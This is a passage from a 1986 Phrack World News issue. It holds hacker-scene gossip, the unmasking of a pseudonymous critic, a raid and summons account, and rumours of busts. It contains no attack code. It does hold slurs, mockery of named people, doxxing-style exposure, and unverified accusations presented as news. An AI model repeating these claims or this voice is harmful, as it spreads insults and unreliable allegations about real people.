Dead Lord then decided to interview Executive Hacker of Chief Executive
|
||
Officers (CEO). The funny part about this interview is that Executive Hacker
|
||
is another handle used by Dead Lord. The only rag mentioned was that Executive
|
||
Hacker didn't know that Ultima IV had been released and that there were only
|
||
two members in CEO. Dead Lord then goes on to say, "LOD is a group of
|
||
egotistical fools..."
|
||
|
||
Then started the straight rags without the interview crap. This is where ole
|
||
Dead Lord gives his opinion on eFerything. For the first few paragraphs he
|
||
rags on The Doctor, SpecElite, pirates in general, Monty Python, and The Flying
|
||
Circus BBS.
|
||
|
||
Then he starts giving descriptions of the people who attend the weekly TAP
|
||
meetings:
|
||
|
||
"Cheshire is a tired old man, Broadway Hacker, who is an obnoxious slob
|
||
anyway, stopped going, the "950 codes kids" Ninja NYC and his pals have
|
||
mostly moved on, though Ninja NYC still attends. Ninja NYC is, at 17 years
|
||
old, a complete criminal, the guy has stolen everything you can think of..."
|
||
|
||
"Two Sigmund Frauds also attend (they are partners) one is a skinny asshole
|
||
who has an earing and the other I never spoke to, but he is he one who
|
||
supposedly does all the BBS calling. There is also some friend of Ninja's
|
||
who works for Northern Telcom."
|
||
|
||
"There is some young guy with a French accent who always smiles, and some
|
||
middle aged fag who is always talking. Then there is MARK! Ye Mark, though
|
||
he tries to be friendly, people try to stay away. He works at a Camera..."
|
||
"He is slightly (very) unbalanced mentally, and always very confused. He is
|
||
teased constantly but tolerated."
|
||
|
||
"There are also a few less important people, such as "Sid" some greasy kid
|
||
who is proud to have had a $1700+ fone bill because he thought he was using
|
||
a diverter. Right now, they are generally a motley bunch. Also they get
|
||
kicked out of restaurants frequently now, and are down to meeting at Burger
|
||
King. <SIGH> How pitiful..."
|
||
|
||
After all of the above bullshit, he talks about Lord Digital, his "cult," and
|
||
his adventures with Paul Muad'Dib. Dead Lord still had more to say though, he
|
||
decided to bring up Monty Python again as well as Phrack, TWCB, Stronghold
|
||
East, Private Sector, and 2600 Magazine. All of what he had to say was
|
||
completely bogus and Dead Lord claimed to be a member of Metal Shop Private,
|
||
although he called it Metal Shop Elite, which is untrue. Fact is he was never
|
||
a member, not even on the old MSP. He also claims that he has submitted
|
||
articles for Phrack, but was turned down because they were original files. Best
|
||
bet is that whatever he was writing, he didn't know what he was talking about.
|
||
|
||
Some notes to Dead Lord, as far as why Taran King was in the hospital; First
|
||
off it was a psychiatric ward not a "hospital". Second, why don't you go and
|
||
read PWN 5-1 for the real story of what happened. Third, the cosysop of
|
||
Stronghold East is not the Slayer, it is Slave Driver.
|
||
|
||
The truth is that both MSP and SE refused to let Dead Lord on and he holds a
|
||
grudge. He then went on to say that both 2600 Magazine and Private Sector
|
||
sucked and that they always have. Of course I am sure that Dead Lord could
|
||
easily put out a better magazine then either/or 2600 and Phrack Inc., and he of
|
||
course has shown that he can run a better BBS than Private Sector or Metal Shop
|
||
Private. He ragged on several other bulletin boards such as Inner View and
|
||
Speed Demon Elite.
|
||
|
||
After all of that he comes back to the subject of Legion of Doom, starts on
|
||
Tribunal of Knowledge, and the says why Chief Executive Officers is better.
|
||
|
||
"LOD's main claim to fame is that Lex Luthor types up shitloads of manuals
|
||
and plasters LOD all over them. Getting published in 2600 every other month
|
||
probably helps also."
|
||
|
||
"Another emerging group CEO, isn't as ridiculous as LOD, I mean the members
|
||
[all two of them] know a lot, and write intelligent stuff..."
|
||
|
||
"Executive Hacker and Corporate Criminal, not much of a group even if these 2
|
||
do stack up better than the entire LOD."
|
||
|
||
His last rags were on Adventurer's Tavern and Disk Rigger.
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
Most of you by now are probably wondering how we tracked him down. Well for
|
||
starters Dead Lord made it a lot easier on us by deciding to mention that he
|
||
lived in NYC. He also talked a lot about others in the NYC area. Dead Lord is
|
||
a member of Draco Tavern. Dead Lord was refused access to Metal Shop Private
|
||
and Stronghold East. Dead Lord's file was refused for Phrack Inc. The
|
||
clincher however was in finding that Dead Lord was actually Executive Hacker,
|
||
and I'm sure that many of you noticed that CEO, the group the Executive Hacker
|
||
belongs to, was highlighted and not ragged on.
|
||
|
||
Some other interesting things about Dead Lord include that fact that he started
|
||
a rumor in New York City, that Taran King had appeared on a talk show dealing
|
||
with hackers and the he is responsible for giving out Sigmund Fraud's and Ninja
|
||
NYC's numbers to Daniel Zigmond and he probably has given him other numbers as
|
||
well.
|
||
|
||
It has been said that Dead Lord's phone number has been disconnected by outside
|
||
sources several times in the past and that the entire TAP Meeting attendees
|
||
group is out to cause him major physical damage.
|
||
_______________________________________________________________________________
|
||
|
||
Quicknotes
|
||
----------
|
||
MOB RULES was indited on five counts of wire fraud by the secret service, the
|
||
charges dated back to 1984. This is supposedly part of the reason that the
|
||
Marauder took down Twilight Zone, but this is pure rumor.
|
||
-------------------------------------------------------------------------------
|
||
More talk about Broadway Hacker being a REAL fed or fed informant has sprung
|
||
up. We at PWN are looking for factual evidence that this is true.
|
||
-------------------------------------------------------------------------------
|
||
Night Stalker, sysop of the Underground, was busted for something dealing with
|
||
Transference of Funds. It is unknown as to if Dan Pasquale had anything to do
|
||
with this bust. Credit Card numbers were frequently found here as well. His
|
||
phone line is being tapped and he cannot really discuss his bust to much. He
|
||
is also under constant surveillance wherever he goes. Look for a full story
|
||
in Phrack World News VII.
|
||
-------------------------------------------------------------------------------
|
||
The rumor that Carrier Culprit was busted is untrue, but he did receive a call
|
||
from AT&T Security, regarding Alliance Teleconferencing Services.
|
||
_______________________________________________________________________________
|
||
|
||
|
||
|
||
|
||
|
||
=========================================================================
|
||
|
||
==Phrack Inc.==
|
||
|
||
Volume One, Issue 7, Phile 10 of 10
|
||
|
||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||
PWN PWN
|
||
PWN *^=-> Phrack World News <-=^* PWN
|
||
PWN PWN
|
||
PWN Issue VI/Part 3 PWN
|
||
PWN PWN
|
||
PWN Compiled and Written by PWN
|
||
PWN PWN
|
||
PWN Knight Lightning PWN
|
||
PWN PWN
|
||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||
|
||
HoloPhax Phreaker Vs. USA July 16, 1986
|
||
-------------------------
|
||
The following is a segment taken out of the summons served to HoloPhax Phreaker
|
||
on the above date. The actual summons was over 10 pages long and was mostly
|
||
depositions from witnesses and/or other testimonies that incriminate HoloPhax
|
||
Phreaker. I am of course substituting HoloPhax Phreaker for his real name.
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - -
|
||
The United States of America and the State of Florida Vs. HoloPhax Phreaker
|
||
|
||
U.S. and Florida Citizen HoloPhax Phreaker, is believed and under suspicion of
|
||
such to have violated the following state and federal laws:
|
||
|
||
U.S. Copyright Laws
|
||
U.S. Telephone Infringement Act
|
||
Florida State Telephone Harassment Laws
|
||
|
||
Reported a false emergency to or harassing the following
|
||
STATE bureaus:
|
||
|
||
Seminole County Police Department
|
||
Seminole County Fire Department
|
||
Orange County Emergency Line (911)
|
||
Orange County Police Department
|
||
Orange County Fire Department
|
||
Orange County Bomb Squad
|
||
Orange County Special Weapons Attack Team (S.W.A.T.)
|
||
|
||
and the following FEDERAL bureaus:
|
||
|
||
Federal Bureau of Investigation (F.B.I.), Tampa office
|
||
Federal Bureau of Investigation (F.B.I.), Orlando office
|
||
United States Secret Service, Orlando office
|
||
National Security Agency, Washington D.C. office
|
||
Central Intelligence Agency (C.I.A.), Washington D.C. office
|
||
Internal Revenue Service (I.R.S.), Tallahassee office
|
||
United States Marine Patrol, Titusville office
|
||
|
||
and to have harassed the following private citizens or companies:
|
||
|
||
John F. Sheehan Bob Driscol Erwin V. Cohen
|
||
Phillip Minkov Margaret Branch Harley Pritchard
|
||
Gladys Smith Kathleen Gallop Frank Yarish
|
||
Aida Smith Ron L. Ebbing Pat C. McCoy
|
||
Kent Schlictemier Doyle E. Bennet Arthur Meyer
|
||
|
||
Rape Crisis Center
|
||
Poison Control
|
||
Spouse Abuse
|
||
Koala Treatment Center
|
||
Chemical Dependency Unit
|
||
Florida Hospital Center for Psychiatry
|
||
Orlando General Hospital; Alcohol and Chemical Dependency Unit
|
||
Cocaine Hot Line
|
||
|
||
U.S. and Florida Citizen HoloPhax Phreaker is also believed and suspected of
|
||
the following felonies and/or misdemeanors:
|
||
|
||
Illegal manipulation of telephone company controlled conversations and devices
|
||
Fraudulent Use of a Credit Card (i.e.: Carding)
|
||
Grand Theft
|
||
Possession of Stolen Property
|
||
Defrauding the Telephone Company (i.e.: Phreaking)
|
||
Illegal Entry (i.e.: Hacking)
|
||
Annoying or Harassing calls
|
||
Theft
|
||
Breaking and Entering
|
||
Assault and Battery
|
||
Harassment of a Government Emergency line
|
||
Threats to the life of the President of the United States of America
|
||
Possible Treason to the United States of America
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
Well, wasn't that nice, especially the parts about *treason* and threats to the
|
||
life of the President of The United States of America. HoloPhax Phreaker
|
||
claims that the majority of the crimes, including all of the harassment
|
||
charges, were committed on an Alliance Teleconference that he was NOT in
|
||
control of and as such had no control over what/who was called and what hap
|
||
pened. One example of this has to do with threatening the life of the
|
||
President, HoloPhax says that this was done on a confer ence with the U.S.
|
||
Secret Service.
|
||
|
||
It all started with a phone call at about 12:30 PM on July 16, 1986. The call
|
||
was placed from a CB (Citizen's Band) radio in a car. They unknown caller told
|
||
HoloPhax that the police were on their way to search his house and would be
|
||
there in 15 minutes. The caller also said that the law enforcement officials
|
||
had a warrant to search HoloPhax's property, however they did not specify as to
|
||
what was to be looked for. HoloPhax grabbed everything he could and buried it
|
||
all in his backyard.
|
||
|
||
Sure enough, within 15 minutes his *expected* guests arrived. One cruiser and
|
||
four unmarked vehicles pulled up blocking his and the neighbor's driveways.
|
||
About sixteen people came to the door and HoloPhax let them in, after all they
|
||
did have a warrant. Several of them pushed HoloPhax aside and then the search
|
||
started on the first floor. While some searched through the sofa, other
|
||
furniture, and drawers, a couple of them flashed the warrant as well as their
|
||
identification, U.S. Secret Service and National Security Agency.
|
||
|
||
They then went up to HoloPhax's room and immediately check his phone's,
|
||
computer's, and television's serial numbers. They also took around 30 pictures
|
||
of things in his room. They then searched through stacks of worthless
|
||
printouts and confiscated several dozen of his disks that contained pirated
|
||
terminal programs, utilities, text files, and games.
|
||
|
||
When they couldn't find any hack/phreak material or a modem, they became angry
|
||
and started ripping the sheets off the beds, pulling up the carpet from the
|
||
floor, and knocking on the walls. While most of them were doing this, another
|
||
agent handed HoloPhax a paper that stated exactly what they were looking for.
|
||
|
||
He told HoloPhax that since they had not found anything on the list, they could
|
||
only leave with what little they had and could NOT take HoloPhax into custody.
|
||
They searched a couple of other rooms, but not as thorough as they had searched
|
||
HoloPhax's room. They had taken books off the shelves and flipped through
|
||
their pages, looked inside pillow cases and under some loose boards in the
|
||
floor. After 1- 1 1/2 hours they finally left and said that HoloPhax would be
|
||
contacted very soon for a hearing date.
|
||
|
||
One of the more interesting members of the search team was Richard Proctor
|
||
(See PWN 5-5 for more information on Richard Proctor).
|
||
|
||
He wore little round glasses that were tinted so you couldn't see his eyes. He
|
||
had long brown hair (longer than a business person should...) and was wearing a
|
||
suit. He had fair skin, but he wasn't really tan. He looked like a mix of a
|
||
dude out of Woodstock and someone from IBM management. He didn't say much, and
|
||
only spoke directly to HoloPhax once. He asked,"Where the fuck are you hiding
|
||
the codes!?" HoloPhax responded with, "Go fuck your sister!" This really
|
||
pissed Proctor off. Proctor then proceeded to tearing up his room pretty bad.
|
||
He seemed to know as much about HoloPhax as the NSA and SS guys did (but then
|
||
he was probably briefed ahead of time).
|
||
|
||
There was also a representative from the local sheriff's department as well as
|
||
one from the F.B.I. They asked HoloPhax several questions , most of them were
|
||
directed to a "mafia" type group called PHBI that is semi-local to HoloPhax's
|
||
area.
|
||
|
||
They seemed to want to connect HoloPhax to many "hits" PHBI had done on people,
|
||
businesses, and the government. They did not make clear what it was they were
|
||
trying to say HoloPhax did, but they sure did try many ways of tricking him
|
||
into admitting that he was a member of this group or some other phreak or
|
||
anarchist league.
|
||
|
||
Ok, now going back to the summons, it was about ten pages long and most of it
|
||
was printouts of accounts on bulletin boards and interviews with people that
|
||
knew something of HoloPhax's activities or activities of close aquaintences.
|
||
|
||
The Infiltrator and HoloPhax used to go to the same school in 10th grade and in
|
||
the summons there was an interview with the police officer of that school that
|
||
mentioned some of the "jobs" that "they" had pulled there and never got caught
|
||
for. Infiltrator was also mentioned in a note by some guy that was named John
|
||
Sheehan who had been harassed by phone/credit for 1 1/2 years. He said that
|
||
HoloPhax and Infiltrator were responsible for the 140 hours of tape he had.
|
||
Infiltrator was also mentioned in several BBS printouts.
|
||
|
||
The law enforcement officials did acquire several of the older issues of Phrack
|
||
Inc. Newsletter and they kept trying to make HoloPhax admit to writing files on
|
||
credit fraud, phreaking, or hacking. Specifically, as far as hacking, were
|
||
files on MILInet and ARPAnet.
|
||
|
||
The handle they were looking for was Agent Orange, which HoloPhax had gone by
|
||
for 6 years. He changed his handle to HoloPhax after an incident that took
|
||
place roughly a year ago when HoloPhax was busted for hacking Compuserve and
|
||
N.A.S.A. accounts. Law enforcement officers had also tried to get him for
|
||
phreaking, but that attempt failed.
|
||
|
||
As far as the mysterious phone call before the bust, HoloPhax thinks that maybe
|
||
the PHBI got wind of what was going down and warned him. How or why he doesn't
|
||
know. It is really unknown as to why he is suspected of being a member of this
|
||
group.
|
||
|
||
HoloPhax admits a guilty plea for the charges of Illegal Entry (Hacking),
|
||
Defrauding the phone company (Phreaking), a little harassment, and possession
|
||
of stolen property. He pleas innocent to the rest of the charges.
|
||
|
||
HoloPhax's last statement was that he will be back into hack/phreaking in the
|
||
near (maybe distant if convicted) future. He is always available for
|
||
conferences if you have questions.
|
||
|
||
Information Provided by HoloPhax Phreaker
|
||
through interview with Knight Lightning
|
||
_______________________________________________________________________________
|
||
|
||
Lightman's Stories...Hoax or Fact? July 20, 1986
|
||
----------------------------------
|
||
Many of you should remember last issue's article about David Lightman and Blade
|
||
Runner. After that article was printed, many other points of view were brought
|
||
up. The following does not necessarily represent the views of Phrack, Phrack
|
||
World News, or myself.
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
According to Ryche, a phreak in the 214 NPA, David Lightman doesn't like Blade
|
||
Runner because of both the P.H.I.R.M. and Worlds Grave Elite kicking him out as
|
||
Co-Sysop of that board.
|
||
|
||
This of course made David Lightman very angry and he decided to change Blade
|
||
Runner's phone number. This of course made Blade Runner very angry as well and
|
||
since he is over 18 years of age, he decided to call David's father and let him
|
||
know what his son has been up to. Supposedly father and son had a long talk
|
||
and David lost his modem privileges for a while.
|
||
|
||
Ryche also cleared up the rumor about Blade Runner working for Southwestern
|
||
Bell Security. David Lightman, using Credimatic, performed a credit check on a
|
||
name that he thought was Blade Runner's, but was in reality a relative of Blade
|
||
Runner. Anyway what David found was that this person worked for ITT. Now as
|
||
many of you should know, ITT has many subsidiaries that are non-Telcom related.
|
||
Nevertheless, David interpreted this guy as being Blade Runner and then for
|
||
unknown reasons started telling people that Blade worked for Southwestern Bell
|
||
Security.
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
That was all Ryche had to say about the Lightman/Runner Controversy. This is
|
||
what he says about David Lightman's "so-called" involvement with Captain
|
||
Midnight and the Administration Voice Mailbox.
|
||
|
||
When Lightman started his Administration Mailbox, several of the local rodents
|
||
decided to inform the FBI that Lightman was providing a way to defraud the
|
||
phone company in the mailbox service. From then on, the FBI must have been
|
||
monitoring the mailbox themselves and when David told everyone that Captain
|
||
Midnight could receive messages there and that he called every week, this must
|
||
have made things very interesting.
|
||
|
||
Ryche also added," Dave set out to make everyone think he knew Captain Midnight
|
||
and he could reach him. He has also, in the past on phone conversations, said
|
||
that Captain Midnight was on Administration Board 1 or some Administration
|
||
board. He has also told me and a few others that he was in the Legion Of
|
||
Doom."
|
||
Information Provided By Ryche
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
Almost all of the above article was from posts on the Phrack board on Metal
|
||
Shop Private. David Lightman said that all of what Ryche says is lies, but
|
||
that he was sick of discussing it and did not want to bring it up again.
|
||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||
July 23, 1986
|
||
|
||
One Wednesday, July 23, 1986 a new message appeared on David Lightman's Voice
|
||
Mailbox that said something like this, 'Attention, please listen! From this day
|
||
forward, I will no longer be calling any BBSes. I have run into trouble and I
|
||
cannot discuss it over the phone line. Telecom College and the Secret Passage
|
||
on Castle Alcazar will be turned over to Radar Detr. Any associates of mine
|
||
are warned to be very careful. Any sysop whose BBS I was on is asked to delete
|
||
my account. Again, I can not discuss this over the phone line. It has really
|
||
been a blast knowing all of you guys over the past 4 years. I have discovered
|
||
that no one is immune to getting caught. I have also found out [studder
|
||
studder] that it [hacking/phreaking] is not worth the price you pay once you
|
||
are caught. Please give this news to Knight Lightning and have him put it in
|
||
Phrack World News. That is the best way I know of to warn my associates.
|
||
Again I cannot discuss this over the phone line, please do not call back.
|
||
That's about it, bye.'
|
||
|
||
Please note that the above is not Lightman's exact words, but it is the general
|
||
idea of what Lightman said. Also, on the same day, Sticky Fingers a 214 NPA
|
||
phreak got a similar message on his voice mailbox.
|
||
|
||
On Wednesday evening at about 6:30 p.m. Mr. BiG, sysop of Phantasm Elite,
|
||
received a call from David Lightman (or rather someone using DL's password).
|
||
Lightman didn't post on this call which is unusual because Lightman always
|
||
posts when he calls. David Lightman logged off at about 6:45 PM. So if this
|
||
really was Lightman and he just didn't post then that places his "trouble" or
|
||
bust somewhere between 6:45 PM and 10:30 PM (When I called his mailbox).
|
||
Question: Who gets busted in the evening?
|
||
|
||
The next day, July 24, Mark Time logged on to Castle Alcazar and saw that
|
||
Lightman was the last caller. Again there were no new posts by David Lightman
|
||
on the board. So, if Lightman was busted then the law enforcement agencies do
|
||
indeed have his BBS and password files. The only other possibility is that
|
||
Lightman was not busted and that this is all a hoax performed for unknown
|
||
reasons.
|
||
|
||
On the same day, Ryche called Lightman to ask what the deal was. He refused to
|
||
talk about it over the phone. However, they did set a time that Lightman would
|
||
call him from a pay phone to discuss it. Later, Lightman called Ryche back and
|
||
told him that he would not discuss the bust until "a few more things were
|
||
cleared up."
|
||
|
||
That evening, I learned from The Safe Cracker that David Lightman was not
|
||
actually busted and that he had received a call from AT&T Security about Blue
|
||
Boxing. This could mean that they knew he boxed [however he lives in an ESS
|
||
area] or that he was on a boxed Alliance Teleconference. Either way it matters
|
||
little. Now nobody can get in touch with him and the message on his mailbox
|
||
has changed.
|
||
|
||
Information Provided By Sticky Fingers & Ryche
|
||
_______________________________________________________________________________
|
||
|
||
|
||
|
||
|